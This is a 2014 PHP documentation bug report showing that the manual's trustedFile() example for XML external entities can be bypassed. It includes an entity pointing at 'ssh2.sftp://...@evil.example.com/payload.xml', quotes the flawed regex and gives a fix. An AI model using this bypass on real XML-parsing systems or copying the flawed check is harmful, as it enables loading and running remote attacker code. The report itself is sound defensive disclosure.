Doc #68368 [Opn->Csd]: Insecure example

From: Date: Fri, 07 Nov 2014 10:59:34 +0000
Subject: Doc #68368 [Opn->Csd]: Insecure example
References: 1  Groups: php.doc.bugs 
Request: Send a blank email to doc-bugs+get-11618@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=68368&edit=1 ID: 68368 Updated by: aharvey@php.net Reported by: clicky at erebot dot net Summary: Insecure example -Status: Open +Status: Closed Type: Documentation Problem Package: Documentation problem Operating System: irrelevant PHP Version: Irrelevant -Assigned To: +Assigned To: aharvey Block user comment: N Private report: N New Comment: This bug has been fixed in the documentation's XML sources. Since the online and downloadable versions of the documentation need some time to get updated, we would like to ask you to be a bit patient. Thank you for the report, and for helping us make our documentation better. Thank you very much! I've changed it as you suggest. Previous Comments: ------------------------------------------------------------------------ [2014-11-07 10:59:29] aharvey@php.net Automatic comment from SVN on behalf of aharvey Revision: http://svn.php.net/viewvc/?view=revision&amp;revision=335165 Log: Change the XML parser external entity example, as suggested by clicky. Fixes doc bug #68368 (Insecure example). ------------------------------------------------------------------------ [2014-11-06 23:33:17] clicky at erebot dot net Description: ------------ --- From manual page: http://www.php.net/example.xml-external-entity --- function trustedFile($file) { // only trust local files owned by ourselves if (!preg_match("@^([a-z]+)\:\/\/@i", $file) && fileowner($file) == getmyuid()) { return true; } return false; } --- This function is not secure as it does not handle schemes containing special characters (digits, '+', '.' or '-') in them. In some circumstances, PHP may define URL wrappers with such names, eg. when the SSH2 extension is installed. Test script: --------------- One way to pass the trustedFile() checks is to load a remote file using SFTP by replacing the following line in xmltest.xml : <!ENTITY systemEntity SYSTEM "xmltest2.xml"> with: <!ENTITY systemEntity SYSTEM "ssh2.sftp://user:pass@evil.example.com/payload.xml"> Also, since the ssh2.sftp wrapper supports stat() calls, it is possible to craft a remote file such that its owner UID matches the current script's owner UID. Based on RFC 3986, this issue can be trivially fixed by changing the regex to: "@^([a-z][a-z0-9+.-]*)\:\/\/@i" Expected result: ---------------- Even though the code given on that page is only an example, it could be interpreted as guidance towards secure parsing of XML documents. Plus, the code specifically says that only local files are "trusted". I would thus expect it to reject attempts to include and execute code from remote resources. Actual result: -------------- <CHAPTER> <TITLE>Title &plainEntity;</TITLE> <PARA> <INFORMALTABLE> <TGROUP COLS="3"> <TBODY> <ROW><ENTRY>a1</ENTRY><ENTRY MOREROWS="1">b1</ENTRY><ENTRY>c1</ENTRY></ROW> <ROW><ENTRY>a2</ENTRY><ENTRY>c2</ENTRY></ROW> <ROW><ENTRY>a3</ENTRY><ENTRY>b3</ENTRY><ENTRY>c3</ENTRY></ROW> </TBODY> </TGROUP> </INFORMALTABLE> </PARA> <FOO> <ELEMENT ATTRIB="value"></ELEMENT> &testEnt; This is some more PHP code being executed. </FOO> <SECTION ID="about"> <TITLE>About this Document</TITLE> <PARA> <!-- this is a comment --> Hi! This is PHP version 5.4.33 </PARA> </SECTION> </CHAPTER>XML error: Invalid URI at line 28 (note: the "XML error" at the end is triggered by the use of a path to a non-existent DTD in xmltest.xml on line 2 [/just/a/test.dtd] and is not related to this bug) ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=68368&edit=1

« previous php.doc.bugs (#11618) next »